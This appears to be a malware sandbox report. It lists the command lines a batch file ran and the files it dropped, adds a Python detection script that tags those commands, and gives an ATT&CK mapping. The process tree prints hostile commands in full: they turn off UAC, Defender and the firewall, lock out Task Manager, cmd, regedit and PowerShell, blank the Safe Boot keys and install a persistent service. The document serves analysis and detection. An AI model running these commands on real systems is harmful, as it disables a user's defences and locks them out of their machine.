    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5032,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5936 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5808,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=6208 /prefetch:8

C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x3fc 0x518

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --field-trial-handle=6440,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --field-trial-handle=6444,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --field-trial-handle=6844,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=6512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --field-trial-handle=6608,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=6684 /prefetch:1

C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat
  - Modifies data under HKEY_USERS

  C:\Windows\system32\net.exe
    cmdline: net session

    C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 session

  C:\Windows\system32\powercfg.exe
    cmdline: powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\powercfg.exe
    cmdline: powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\powercfg.exe
    cmdline: powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\powercfg.exe
    cmdline: powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\netsh.exe
    cmdline: netsh advfirewall set allprofiles state off
    - Modifies Windows Firewall

  C:\Windows\system32\reg.exe
    cmdline: REG IMPORT "C:\Windows\TEMP\disable_winload.reg"

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKCU\Control Panel\Desktop\MuiCached" /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKCU\Control Panel\Desktop\MuiCache" /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
    - UAC bypass

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4

    C:\Windows\system32\ipconfig.exe
      cmdline: ipconfig
      - Gathers network information

    C:\Windows\system32\findstr.exe
      cmdline: findstr IPv4

  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c whoami

    C:\Windows\system32\whoami.exe
      cmdline: whoami
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c net user "GYLQWJCN$"

    C:\Windows\system32\net.exe
      cmdline: net user "GYLQWJCN$"

  C:\Windows\system32\takeown.exe
    cmdline: takeown /f "C:\Windows\System32\notepad.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\icacls.exe
    cmdline: icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
    - Possible privilege escalation attempt
    - Modifies file permissions

  C:\Windows\system32\manage-bde.exe
    cmdline: manage-bde -off C:

  C:\Windows\system32\manage-bde.exe
    cmdline: manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"

  C:\Windows\system32\bcdedit.exe
    cmdline: bcdedit /set {default} recoveryenabled yes
    - Modifies boot configuration data using bcdedit

  C:\Windows\system32\bcdedit.exe
    cmdline: bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    - Modifies boot configuration data using bcdedit

  C:\Windows\system32\sc.exe
    cmdline: sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
    - Launches sc.exe

  C:\Windows\system32\net.exe
    cmdline: net start MiServicio

    C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 start MiServicio

  C:\Windows\system32\takeown.exe
    cmdline: takeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\icacls.exe
    cmdline: icacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
    - Possible privilege escalation attempt
    - Modifies file permissions
C:\Windows\system32\OpenWith.exe
  cmdline: C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\OpenWith.exe
  cmdline: C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\OpenWith.exe
  cmdline: C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\OpenWith.exe
  cmdline: C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\LogonUI.exe
  cmdline: "LogonUI.exe" /flags:0x4 /state0:0xa38fb055 /state1:0x41c64e6d
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
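The command lines the sandbox recorded under cmd.exe /c malware.bat are the raw material for detection content: each reg add, netsh or bcdedit call has a benign use on its own, and it is the whole chain (UAC off, Defender off, firewall off, Task Manager, regedit, cmd and PowerShell locked out, Safe Boot keys blanked, a service created from a .bat in the user's Temp) that makes the verdict. The Python below is an added example for this page, not sandbox output and not code from the sample: it tags each command line with the control it tampers with and flags a process list that disables several distinct controls at once. The tag names, regexes and the triage threshold are this example's own choices; SAMPLE_CMDLINES is constructed from the process tree above. One caveat the report itself shows: the batch runs REG IMPORT on C:\Windows\TEMP\disable_winload.reg, while the dropped file listed under Downloads is C:\Users\Admin\AppData\Local\Temp\disable_winload.reg, and the page gives that file's hashes but not its contents, so no rule here claims to know what it sets.

```python
"""Tag sandbox-recorded command lines with the defensive control they tamper with.

Added example for this report page; not sandbox output and not code from the
analysed sample.  Tag names, regexes and the triage threshold are this
example's own.  SAMPLE_CMDLINES is constructed from the command lines the
sandbox recorded under cmd.exe /c malware.bat.
"""
import re
from collections import Counter

# Rules are matched case-insensitively: reg.exe and netsh accept any casing,
# and the batch itself mixes "REG IMPORT" with "reg add".
RULES = [
    ("uac_disabled",        r"EnableLUA\s+/t\s+REG_DWORD\s+/d\s+0\b"),
    ("defender_disabled",   r"Windows Defender.*DisableAntiSpyware.*/d\s+1\b"),
    ("firewall_disabled",   r"^netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off"),
    ("taskmgr_disabled",    r"DisableTaskMgr.*/d\s+1\b"),
    ("regedit_disabled",    r"DisableRegistryTools.*/d\s+1\b"),
    ("cmd_disabled",        r"DisableCMD.*/d\s+[12]\b"),
    ("powershell_disabled", r"Policies\\Microsoft\\Windows\\PowerShell.*"
                            r"(EnableScripts.*/d\s+0\b|ExecutionPolicy.*Restricted)"),
    ("gpo_disabled",        r"DisableGPO.*/d\s+1\b"),
    ("safeboot_tampered",   r"SafeBoot\\Minimal"),
    ("bcdedit_modified",    r"^bcdedit\s+/set\b"),
    ("service_created",     r"^sc\s+create\b.*\bbinPath="),
    ("service_started",     r"^net\s+start\b"),
    ("acl_tampered",        r"^(takeown\s+/f\b|icacls\s+.*/(deny|grant)\b)"),
    ("bitlocker_modified",  r"^manage-bde\s+-(on|off)\b"),
    ("powercfg_modified",   r"^powercfg\s+/set(ac|dc)valueindex\b"),
    ("reg_import",          r"^reg\s+import\b"),
    # "net session" fails unless elevated, which is why batch droppers run it first.
    ("recon",               r"^(whoami|ipconfig|net\s+(user|session))\b"),
]
COMPILED = [(tag, re.compile(rx, re.IGNORECASE)) for tag, rx in RULES]

# Tags whose presence means a defensive control was switched off, as opposed
# to recon or bookkeeping; the triage verdict counts distinct members of this set.
INHIBITOR_TAGS = frozenset({
    "uac_disabled", "defender_disabled", "firewall_disabled", "taskmgr_disabled",
    "regedit_disabled", "cmd_disabled", "powershell_disabled", "gpo_disabled",
    "safeboot_tampered",
})

SAMPLE_CMDLINES = [  # constructed from the report's process tree
    r'net session',
    r'powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0',
    r'netsh advfirewall set allprofiles state off',
    r'REG IMPORT "C:\Windows\TEMP\disable_winload.reg"',
    r'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f',
    r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f',
    r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f',
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f',
    r'reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f',
    r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f',
    r'whoami',
    r'takeown /f "C:\Windows\System32\notepad.exe"',
    r'icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)',
    r'manage-bde -off C:',
    r'bcdedit /set {default} recoveryenabled yes',
    r'sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"',
    r'net start MiServicio',
]


def classify(cmdline: str) -> list[str]:
    """Return every tag whose rule matches one command line (empty list if none)."""
    return [tag for tag, rx in COMPILED if rx.search(cmdline)]


def summarize(cmdlines):
    """Count tags over a whole process list and keep the lines no rule explained,
    so the rule set can be reviewed against what the sandbox actually recorded."""
    counts = Counter()
    unmatched = []
    for line in cmdlines:
        tags = classify(line)
        counts.update(tags)
        if not tags:
            unmatched.append(line)
    return counts, unmatched


def inhibited_controls(cmdlines) -> set[str]:
    """Distinct defensive controls that a process list switches off."""
    counts, _ = summarize(cmdlines)
    return INHIBITOR_TAGS & set(counts)


def is_inhibitor_chain(cmdlines, minimum: int = 3) -> bool:
    """Triage verdict: one of these changes may be an admin at work; a single
    batch that disables `minimum` or more distinct controls is not."""
    return len(inhibited_controls(cmdlines)) >= minimum


if __name__ == "__main__":
    counts, unmatched = summarize(SAMPLE_CMDLINES)
    for tag, n in sorted(counts.items()):
        print(f"{tag:22s} {n}")
    print("unmatched:", unmatched)
    print("inhibitor chain:", is_inhibitor_chain(SAMPLE_CMDLINES))
```

The unmatched list is the review loop: when a new sample's process tree leaves lines untagged, either they are noise or the rule set needs a row, and either way the analyst sees them rather than silently losing them. The threshold of three distinct controls is deliberately low because the report shows nine disabled by one batch; tune it against what legitimate hardening scripts in your environment actually do.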
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Execution
- System Services (1)
  - Service Execution (1)
- Command and Scripting Interpreter (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Create or Modify System Process (2)
  - Windows Service (2)
Downloads

C:\Users\Admin\AppData\Local\Temp\disable_winload.reg
  Filesize: 91B
  MD5: 47b5ae368c4aff20eafa90ffdcd03a34
  SHA1: dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81
  SHA256: aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07
  SHA512: c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db
  Filesize: 1024KB
  MD5: 94194e2fa69ff276dc002efb0f8abcb6
  SHA1: 701f2598e03e52079e6cdc7447b0599074cd0b16
  SHA256: b7c138f85c20298bdffca80a05ce874ee1456093b003a88c839031f2f21549cc
  SHA512: ee89547299c1c9b0bc9288872cde385ebe60195444644551290a660bc7471802b7ace97565bfcde6d525e84aed05727855ef49b97c27d38403490a4ca4f677a5

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
  Filesize: 7KB
  MD5: 83d0f9f348182309763ee1ccf371bfc6
  SHA1: 1bdeab33c57933dcdc7aeebde33daf840278a43f
  SHA256: 4ec103ac2a883e56fa40b536de331ddf1431a3937e7aa54b2b1cbc3c912e16f6
  SHA512: 7a06900f29fbde70dde1105a538ec60d5aca4cccaa70e55880365615daf8a4eb5d7e51abe6a96a45103bd8f86aafe9044eada9732095b04d6e873d83fabd597d